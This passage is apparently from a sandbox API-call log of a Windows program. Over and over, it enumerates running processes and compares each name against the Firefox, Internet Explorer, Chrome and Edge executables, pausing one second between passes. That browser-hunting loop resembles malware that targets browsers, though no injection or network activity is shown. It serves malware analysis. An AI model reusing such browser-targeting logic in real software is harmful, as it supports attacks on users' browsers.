[0242.065] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0242.065] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0242.065] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0242.065] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.065] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0242.065] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0242.065] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0242.065] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0242.065] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.065] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.066] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.066] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.066] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.066] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.066] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0242.066] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0242.067] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0242.067] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0242.067] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.067] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0242.067] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0242.067] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0242.067] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0242.067] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.067] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0242.068] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0242.068] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0242.068] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0242.068] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.068] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0242.068] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0242.068] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0242.068] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0242.068] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.068] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0242.069] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0242.069] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0242.069] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0242.069] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.069] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0242.069] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0242.069] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0242.069] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0242.070] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.070] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0242.070] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0242.070] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0242.070] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0242.070] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.070] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0242.071] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0242.071] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0242.071] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0242.071] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.071] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0242.071] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0242.071] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0242.071] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0242.071] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.071] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0242.072] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0242.072] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0242.072] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0242.072] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.072] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0242.072] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0242.072] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0242.072] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0242.072] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.072] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0242.073] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0242.073] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0242.073] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0242.073] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.073] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0242.073] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0242.074] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0242.074] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0242.074] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.074] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0242.074] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0242.074] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0242.074] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0242.074] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.074] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0242.075] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0242.075] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0242.075] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0242.075] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.075] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0242.075] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0242.075] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0242.075] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0242.076] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.076] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0242.076] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0242.076] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0242.076] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0242.076] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.076] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0242.077] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0242.077] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0242.077] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0242.077] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.077] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0242.077] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0242.077] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0242.077] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0242.077] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.077] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0242.078] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0242.078] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0242.078] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0242.078] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.078] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0242.078] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0242.078] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0242.078] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0242.078] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.078] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0242.079] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0242.079] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0242.079] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0242.079] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.079] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.079] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0242.079] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0242.079] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0242.080] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.080] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.080] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.080] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.080] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.080] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.080] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0242.081] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0242.081] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0242.081] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0242.081] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.081] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.081] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0242.081] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0242.081] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0242.081] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.081] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0242.082] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0242.082] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0242.082] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0242.082] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.082] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.082] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0242.082] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0242.082] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0242.082] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.082] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0242.083] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0242.083] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0242.083] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0242.083] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.083] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.084] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0242.084] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0242.084] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0242.084] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0242.084] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.084] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0242.084] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0242.084] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0242.084] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.084] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.085] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0242.085] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0242.085] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0242.085] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.085] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.085] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0242.085] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0242.085] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0242.085] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.085] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.086] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0242.086] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0242.086] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0242.086] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0242.086] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0242.086] CloseHandle (hObject=0xd4) returned 1 [0242.086] Sleep (dwMilliseconds=0x3e8) [0243.088] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0243.090] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.090] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0243.090] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0243.090] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0243.090] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0243.090] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0243.091] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0243.091] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0243.091] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0243.091] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0243.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0243.091] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0243.091] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0243.091] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0243.091] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0243.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, 